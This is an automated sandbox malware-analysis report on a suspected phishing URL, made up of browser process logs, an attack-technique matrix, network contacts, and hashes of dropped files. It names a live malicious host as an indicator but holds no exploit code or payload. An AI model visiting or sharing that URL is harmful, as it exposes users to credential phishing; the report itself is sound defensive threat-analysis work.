    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6276 --field-trial-handle=2536,i,1983186790017537026,10976805212909534197,262144 /prefetch:8Jump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6592 --field-trial-handle=2536,i,1983186790017537026,10976805212909534197,262144 /prefetch:8Jump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=5572 --field-trial-handle=2536,i,1983186790017537026,10976805212909534197,262144 /prefetch:8Jump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=5572 --field-trial-handle=2536,i,1983186790017537026,10976805212909534197,262144 /prefetch:8Jump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2092,i,12039556330216411981,17761890535772019975,262144 /prefetch:3Jump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1680 --field-trial-handle=2068,i,391148098692564676,17790295371905818145,262144 /prefetch:3
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868Jump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868Jump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeSection loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe protection: readonlyJump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
    Browser Extensions
    11
    Process Injection
    1
    Masquerading
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Registry Run Keys / Startup Folder
    1
    Registry Run Keys / Startup Folder
    11
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1586748 URL: https://bryf.atchirlisc.ru/... Startdate: 09/01/2025 Architecture: WINDOWS Score: 60 49 Yara detected HtmlPhish44 2->49 51 AI detected suspicious Javascript 2->51 53 AI detected suspicious URL 2->53 6 msedge.exe 152 517 2->6         started        9 chrome.exe 1 2->9         started        12 msedge.exe 10 2->12         started        14 2 other processes 2->14 process3 dnsIp4 55 Maps a DLL or memory area into another process 6->55 16 msedge.exe 39 6->16         started        19 msedge.exe 6->19         started        21 msedge.exe 6->21         started        29 2 other processes 6->29 43 192.168.2.16 unknown unknown 9->43 45 192.168.2.4, 138, 443, 49331 unknown unknown 9->45 47 239.255.255.250 unknown Reserved 9->47 23 chrome.exe 9->23         started        25 msedge.exe 12->25         started        27 msedge.exe 14->27         started        signatures5 process6 dnsIp7 31 googlehosted.l.googleusercontent.com 142.250.186.129, 443, 49790 GOOGLEUS United States 16->31 33 162.159.61.3, 443, 49805 CLOUDFLARENETUS United States 16->33 39 7 other IPs or domains 16->39 35 bryf.atchirlisc.ru 104.21.80.1, 443, 49741, 49742 CLOUDFLARENETUS United States 23->35 37 www.google.com 142.250.186.68, 443, 49738 GOOGLEUS United States 23->37 41 3 other IPs or domains 23->41

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    https://bryf.atchirlisc.ru/EeMAGvIe/0%Avira URL Cloudsafe
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://bryf.atchirlisc.ru/favicon.ico0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    s-part-0012.t-0009.t-msedge.net
    13.107.246.40
    truefalse
      high
      chrome.cloudflare-dns.com
      172.64.41.3
      truefalse
        high
        a.nel.cloudflare.com
        35.190.80.1
        truefalse
          high
          code.jquery.com
          151.101.130.137
          truefalse
            high
            s-part-0017.t-0009.t-msedge.net
            13.107.246.45
            truefalse
              high
              www.google.com
              142.250.186.68
              truefalse
                high
                bryf.atchirlisc.ru
                104.21.80.1
                truetrue
                  unknown
                  googlehosted.l.googleusercontent.com
                  142.250.186.129
                  truefalse
                    high
                    clients2.googleusercontent.com
                    unknown
                    unknownfalse
                      high
                      bzib.nelreports.net
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://bryf.atchirlisc.ru/EeMAGvIe/true
                          unknown
                          https://bryf.atchirlisc.ru/favicon.icofalse
                          • Avira URL Cloud: safe
                          unknown
                          https://code.jquery.com/jquery-3.6.0.min.jsfalse
                            high
                            https://a.nel.cloudflare.com/report/v4?s=RCVyA2PmCfeA6ON61TEjBpw%2Fm12h53FjdAjxb4FjBGXqwn1FWtJRvY1aQKGCLi3Cy6IY8gvA3is%2Fk8cLz1KQGXWbMe0zkt6QAiJf%2Ftxe%2FQyWZveMmFngujKg7zpljg%3D%3Dfalse
                              high
                              https://chrome.cloudflare-dns.com/dns-queryfalse
                                high
                                https://clients2.googleusercontent.com/crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crxfalse
                                  high
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabWeb Data.11.drfalse
                                    high
                                    https://web.whatsapp.comfe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                      high
                                      https://duckduckgo.com/ac/?q=Web Data.11.drfalse
                                        high
                                        https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshorelinefe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                          high
                                          https://m.kugou.com/fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                            high
                                            https://www.office.comfe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                              high
                                              https://outlook.live.com/mail/0/fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                high
                                                https://www.last.fm/fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                  high
                                                  https://powerpoint.new?from=EdgeM365Shorelinefe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                    high
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Web Data.11.drfalse
                                                      high
                                                      https://aefd.nelreports.net/api/report?cat=bingcspReporting and NEL.11.drfalse
                                                        high
                                                        https://tidal.com/fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                          high
                                                          https://docs.google.com/manifest.json0.11.drfalse
                                                            high
                                                            https://www.youtube.comfe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                              high
                                                              https://www.instagram.comfe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                high
                                                                https://web.skype.com/?browsername=edge_canary_shorelinefe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                  high
                                                                  https://gaana.com/fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                    high
                                                                    https://drive-staging.corp.google.com/manifest.json0.11.drfalse
                                                                      high
                                                                      https://drive.google.com/manifest.json0.11.drfalse
                                                                        high
                                                                        https://outlook.live.com/mail/compose?isExtension=truefe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                          high
                                                                          https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                            high
                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchWeb Data.11.drfalse
                                                                              high
                                                                              https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                                high
                                                                                https://www.messenger.comfe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                                  high
                                                                                  https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedgefe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                                    high
                                                                                    https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=truefe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                                      high
                                                                                      https://outlook.office.com/mail/compose?isExtension=truefe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                                        high
                                                                                        https://i.y.qq.com/n2/m/index.htmlfe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                                          high
                                                                                          https://www.deezer.com/fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                                            high
                                                                                            https://latest.web.skype.com/?browsername=edge_canary_shorelinefe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                                              high
                                                                                              https://word.new?from=EdgeM365Shorelinefe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                                                high
                                                                                                https://www.office.com/Top Sites.11.drfalse
                                                                                                  high
                                                                                                  https://chrome.cloudflare-dns.comNetwork Persistent State0.11.drfalse
                                                                                                    high
                                                                                                    https://web.telegram.org/fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                                                      high
                                                                                                      https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=truefe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                                                        high
                                                                                                        https://outlook.office.com/mail/0/fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                                                          high
                                                                                                          https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demofe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                                                            high
                                                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoWeb Data.11.drfalse
                                                                                                              high
                                                                                                              https://m.soundcloud.com/fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                                                                high
                                                                                                                https://mail.google.com/mail/mu/mp/266/#tl/Inboxfe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                                                                  high
                                                                                                                  https://cdnjs.cloudflare.com/ajax/libs/mathjax/service_worker_bin_prod.js.11.dr, offscreendocument_main.js.11.drfalse
                                                                                                                    high
                                                                                                                    https://drive-daily-2.corp.google.com/manifest.json0.11.drfalse
                                                                                                                      high
                                                                                                                      https://drive-autopush.corp.google.com/manifest.json0.11.drfalse
                                                                                                                        high
                                                                                                                        https://music.amazon.comfe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                                                                          high
                                                                                                                          https://drive-daily-4.corp.google.com/manifest.json0.11.drfalse
                                                                                                                            high
                                                                                                                            https://vibe.naver.com/todayfe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                                                                              high
                                                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Web Data.11.drfalse
                                                                                                                                high
                                                                                                                                https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedgefe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                                                                                  high
                                                                                                                                  https://www.office.com/OfficeTop Sites.11.drfalse
                                                                                                                                    high
                                                                                                                                    https://open.spotify.comfe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                                                                                      high
                                                                                                                                      https://twitter.com/fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                                                                                        high
                                                                                                                                        https://drive-daily-1.corp.google.com/manifest.json0.11.drfalse
                                                                                                                                          high
                                                                                                                                          https://excel.new?from=EdgeM365Shorelinefe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                                                                                            high
                                                                                                                                            https://web.skype.com/?browsername=edge_stable_shorelinefe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                                                                                              high
                                                                                                                                              https://www.onenote.com/stickynotesstaging?isEdgeHub=truefe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                                                                                                high
                                                                                                                                                https://drive-daily-5.corp.google.com/manifest.json0.11.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://m.vk.com/fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://bzib.nelreports.net/api/report?cat=bingbusinessReporting and NEL.11.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.google.com/chromecontent_new.js.11.dr, content.js.11.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://www.tiktok.com/fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://drive-daily-6.corp.google.com/manifest.json0.11.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://drive-daily-0.corp.google.com/manifest.json0.11.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://www.onenote.com/stickynotes?isEdgeHub=truefe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://www.iheart.com/podcast/fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://music.yandex.comfe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://chromewebstore.google.com/manifest.json.11.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://drive-preprod.corp.google.com/manifest.json0.11.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://chrome.google.com/webstore/manifest.json.11.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://y.music.163.com/m/fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://bard.google.com/fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://drive-daily-3.corp.google.com/manifest.json0.11.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                    142.250.186.68
                                                                                                                                                                                    www.google.comUnited States
                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                    104.21.80.1
                                                                                                                                                                                    bryf.atchirlisc.ruUnited States
                                                                                                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                                                                                                    151.101.130.137
                                                                                                                                                                                    code.jquery.comUnited States
                                                                                                                                                                                    54113FASTLYUSfalse
                                                                                                                                                                                    162.159.61.3
                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                    35.190.80.1
                                                                                                                                                                                    a.nel.cloudflare.comUnited States
                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                    172.64.41.3
                                                                                                                                                                                    chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                    151.101.2.137
                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                    54113FASTLYUSfalse
                                                                                                                                                                                    142.250.186.129
                                                                                                                                                                                    googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                    239.255.255.250
                                                                                                                                                                                    unknownReserved
                                                                                                                                                                                    unknownunknownfalse
                                                                                                                                                                                    IP
                                                                                                                                                                                    192.168.2.16
                                                                                                                                                                                    192.168.2.4
                                                                                                                                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                    Analysis ID:1586748
                                                                                                                                                                                    Start date and time:2025-01-09 15:28:38 +01:00
                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                    Overall analysis duration:0h 3m 28s
                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                    Report type:full
                                                                                                                                                                                    Cookbook file name:browseurl.jbs
                                                                                                                                                                                    Sample URL:https://bryf.atchirlisc.ru/EeMAGvIe/
                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                    Number of analysed new started processes analysed:25
                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                    Technologies:
                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                    Classification:mal60.phis.evad.win@64/298@20/11
                                                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 216.58.206.67, 216.58.206.46, 108.177.15.84, 142.250.184.238, 172.217.16.206, 142.250.186.110, 142.250.185.234, 142.250.185.138, 142.250.186.42, 142.250.185.106, 172.217.23.106, 172.217.18.10, 142.250.186.74, 216.58.206.42, 172.217.16.202, 142.250.186.170, 142.250.181.234, 142.250.184.202, 142.250.185.202, 142.250.186.106, 142.250.186.138, 142.250.185.170, 199.232.214.172, 192.229.221.95, 142.250.185.206, 172.217.18.110, 142.250.181.238, 2.23.227.215, 2.23.227.221, 2.23.227.208, 13.107.42.16, 204.79.197.239, 13.107.21.239, 142.250.186.174, 13.107.6.158, 2.23.227.199, 2.23.227.211, 2.16.168.107, 2.16.168.120, 2.16.168.115, 2.16.168.122, 216.58.206.78, 172.217.18.3, 142.250.186.46, 34.104.35.123, 142.250.186.78, 2.22.50.131, 142.251.40.227, 142.250.80.3, 142.251.41.3, 23.219.82.32, 23.219.82.90, 23.219.82.19, 13.107.22.239, 131.253.33.239, 23.56.254.164, 173.222.162.32, 13.89.179.13, 173.222.162.51, 4.245.163.56, 204.79.197.222, 152.199.19.161, 13.107.246.45, 13.107.246
                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): fp.msedge.net, cdp-f-ssl-tlu-net.trafficmanager.net, copilot.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, clientservices.googleapis.com, edgeassetservice.afd.azureedge.net, fp-vp-nocache.azureedge.net, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, config-edge-skype.l-0007.l-msedge.net, star-t-p.trafficmanager.net, update.googleapis.com, www.gstatic.com, l-0007.l-msedge.net, www.bing.com, fs.microsoft.com, content-autofill.googleapis.com, reserved-p01.afd.azureedge.net, www.googleapis.com, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, edgedl.me.gvt1.com, e107108.dscx.akamaiedge.net, edgeassetservice.azureedge.net, clients.l.google.com, copilot.microsoft.com.edgekey.net, browser.pipe.aria.microsoft.com, config.edge.skype.com.trafficmanager.net, redirector.gvt1.com, www.bing.com.edgekey.net, r.bing.com, copilot-copilot-msft-com.traf
                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                    • VT rate limit hit for: https://bryf.atchirlisc.ru/EeMAGvIe/
                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                    14:30:09AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868 "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
                                                                                                                                                                                    14:30:17AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868 "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
                                                                                                                                                                                    No context
                                                                                                                                                                                    No context
                                                                                                                                                                                    No context
                                                                                                                                                                                    No context
                                                                                                                                                                                    No context
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):22881
                                                                                                                                                                                    Entropy (8bit):6.047843593825372
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:7tMkaMJH2m8qVT8IeQ0I5t0b9MEFdsNwhvkjQWC0T35ub/Y3jFd4J:xMkbJrT8IeQc5d1mjXC0L5uTY3JA
                                                                                                                                                                                    MD5:61560FE07B54B4CEDF8A22C0AA4B2DD1
                                                                                                                                                                                    SHA1:159CB5DAA099FFC2BC20F1A032647E5C4300D848
                                                                                                                                                                                    SHA-256:3DEA8F8D6ACA863B856BD700123FC8A7D3E28C8044DC5FC2849DD746BCB5FF05
                                                                                                                                                                                    SHA-512:F7557899996C96FE3C33FEB7551383A48591F41EBEDD06EE1F2D682C79EC21D2DCE4C7ACB727B249F18C8C75CF6588F1A6F00748FA2D6008AAC55B9A04B2491A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380906602124790","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1736433006"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):8235
                                                                                                                                                                                    Entropy (8bit):5.802296603786181
                                                                                                                                                                                    Encrypted:false
